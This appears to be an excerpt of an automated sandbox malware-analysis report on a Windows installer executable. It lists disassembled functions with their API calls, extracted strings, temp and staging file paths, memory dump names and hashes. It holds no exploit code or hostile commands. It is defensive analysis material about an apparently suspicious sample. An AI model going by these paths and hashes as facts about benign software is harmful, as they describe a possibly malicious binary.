SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
ShowWindow.USER32(?,00000005), ref: 00404D5E
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
ImageList_Destroy.COMCTL32(?), ref: 00404F2E
GlobalFree.KERNEL32(?), ref: 00404F3E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
SendMessageW.USER32(?,00001102,?,?), ref: 00405060
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
InvalidateRect.USER32(?,00000000,?), ref: 0040508F
ShowWindow.USER32(?,00000000), ref: 004050DD
GetDlgItem.USER32(?,000003FE), ref: 004050E8
ShowWindow.USER32(00000000), ref: 004050EF

Strings

M, xrefs: 00404CB8
N, xrefs: 00404D99
, xrefs: 004050C7

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
Opcode Fuzzy Hash: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58

Function 004045C8 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 269stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404617
SetWindowTextW.USER32(00000000,?), ref: 00404641
SHBrowseForFolderW.SHELL32(?), ref: 004046F2
CoTaskMemFree.OLE32(00000000), ref: 004046FD
lstrcmpiW.KERNEL32(Call,004226D0,00000000,?,?), ref: 0040472F
lstrcatW.KERNEL32(?,Call), ref: 0040473B
SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D

Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB

Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\u9aPQQIwhj.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 004061DF
Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\u9aPQQIwhj.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 004061F3
Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 00406206

GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF

Strings

C:\Users\user\Uploadable\normallnnens, xrefs: 00404718
A, xrefs: 004046EB
Call, xrefs: 00404729, 0040472E, 00404739

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Users\user\Uploadable\normallnnens$Call
API String ID: 2246997448-1071425816
Opcode ID: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
Opcode Fuzzy Hash: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69

Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407474,?,?,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD

Strings

C:\Users\user\Uploadable\normallnnens\Trskelen, xrefs: 004020F5

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\Uploadable\normallnnens\Trskelen
API String ID: 542301482-936114887
Opcode ID: 0ecf81e3720b8fa1d97477eddaf9048000be678ddf3c5f5c56140a49ea83b6a4
Instruction ID: c11495a377249a79f2c0f90d15cc2262a1b8c0356f549485b3d6f64f05c33611
Opcode Fuzzy Hash: 0ecf81e3720b8fa1d97477eddaf9048000be678ddf3c5f5c56140a49ea83b6a4
Instruction Fuzzy Hash: 51416F75A00104BFCB00DFA8C988EAE7BB6EF48314B20456AF905EB2D1CB79ED41CB55

Function 0040276E Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277D

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 4cbdbd8e282f3210afb702b0731cfa06ea0a4afed203f093be5a44e6b438530a
Instruction ID: 660448b4c8776a587482eabd0d7c95c139f1dfbade13b447c4bb41c6a72f42af
Opcode Fuzzy Hash: 4cbdbd8e282f3210afb702b0731cfa06ea0a4afed203f093be5a44e6b438530a
Instruction Fuzzy Hash: 7EF082B1614114DBDB00DFA5DD499AEB378FF15314F60097BF111F31D0D6B459409B2A

Function 004042CA Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 00404368
GetDlgItem.USER32(?,000003E8), ref: 0040437C
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404399
GetSysColor.USER32(?), ref: 004043AA
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
lstrlenW.KERNEL32(?), ref: 004043CB
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
GetDlgItem.USER32(?,0000040A), ref: 00404446
SendMessageW.USER32(00000000), ref: 0040444D
GetDlgItem.USER32(?,000003E8), ref: 00404478
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
SetCursor.USER32(00000000), ref: 004044CC
ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,?), ref: 004044E1
LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
SetCursor.USER32(00000000), ref: 004044F0
SendMessageW.USER32(00000111,?,00000000), ref: 0040451F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531

Strings

open, xrefs: 004044D9
N, xrefs: 00404466
AB@, xrefs: 004044D6
Call, xrefs: 004044A7

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: AB@$Call$N$open
API String ID: 3615053054-1375180041
Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9

Function 00405C06 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAA,?,?,?,00405922,?,00000000,000000F1,?), ref: 00405C16
CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,?,00405DAA,?,?,?,00405922,?,00000000,000000F1,?), ref: 00405C3A
GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43

Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB

GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
wsprintfA.USER32 ref: 00405C7E
GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
GlobalFree.KERNEL32(00000000), ref: 00405D6F
CloseHandle.KERNEL32(00000000), ref: 00405D76

Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\u9aPQQIwhj.exe,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A

Strings

NUL, xrefs: 00405C10
%ls=%ls, xrefs: 00405C74
[Rename], xrefs: 00405CE8, 00405CFA
peB, xrefs: 00405C55
p]B, xrefs: 00405C0B

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %ls=%ls$NUL$[Rename]$p]B$peB
API String ID: 1265525490-3322868524
Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5

Function 100022EB Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 10002391
GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
CLSIDFromString.OLE32(?,00000000), ref: 100023BF
GlobalAlloc.KERNEL32(00000040), ref: 100023DD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
GlobalFree.KERNEL32(00000000), ref: 1000241A

Strings

@Hmu, xrefs: 100023BF

Memory Dump Source

Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd

Similarity

API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
String ID: @Hmu
API String ID: 3579998418-887474944
Opcode ID: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
Instruction ID: d73bd5747cd055fead3767a403609930cc226346ea8e15a1dc9f8d9e67d80713
Opcode Fuzzy Hash: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
Instruction Fuzzy Hash: AC419FB4504706EFF324DF249C94A6A77ECFB443D0F11892DF98AC6199CB34AA94CB61

Function 0040617C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\u9aPQQIwhj.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 004061DF
CharNextW.USER32(?,?,?,00000000), ref: 004061EE
CharNextW.USER32(?,"C:\Users\user\Desktop\u9aPQQIwhj.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 004061F3
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 00406206

Strings

*?|<>/":, xrefs: 004061CE
C:\Users\user\AppData\Local\Temp\, xrefs: 0040617D, 00406182
"C:\Users\user\Desktop\u9aPQQIwhj.exe", xrefs: 004061C0

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\u9aPQQIwhj.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-999210136
Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD

Function 004024EC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54filestringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsh4048.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000400,?,?,00000021), ref: 0040252D
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsh4048.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000400,?,?,00000021), ref: 00402534
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402566

Strings

8, xrefs: 0040250A
C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll, xrefs: 004024F8, 00402519, 00402523, 00402533, 0040255A
C:\Users\user\AppData\Local\Temp\nsh4048.tmp, xrefs: 00402526

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: ByteCharFileMultiWideWritelstrlen
String ID: 8$C:\Users\user\AppData\Local\Temp\nsh4048.tmp$C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll
API String ID: 1453599865-3490629075
Opcode ID: d7acd23ebc5546f64b4a77e0e3a0c197fda55befd460687716db138643d5bdd5
Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
Opcode Fuzzy Hash: d7acd23ebc5546f64b4a77e0e3a0c197fda55befd460687716db138643d5bdd5
Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E

Function 00404194 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004041B1
GetSysColor.USER32(00000000), ref: 004041CD
SetTextColor.GDI32(?,00000000), ref: 004041D9
SetBkMode.GDI32(?,?), ref: 004041E5
GetSysColor.USER32(?), ref: 004041F8
SetBkColor.GDI32(?,?), ref: 00404208
DeleteObject.GDI32(?), ref: 00404222
CreateBrushIndirect.GDI32(?), ref: 0040422C

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25

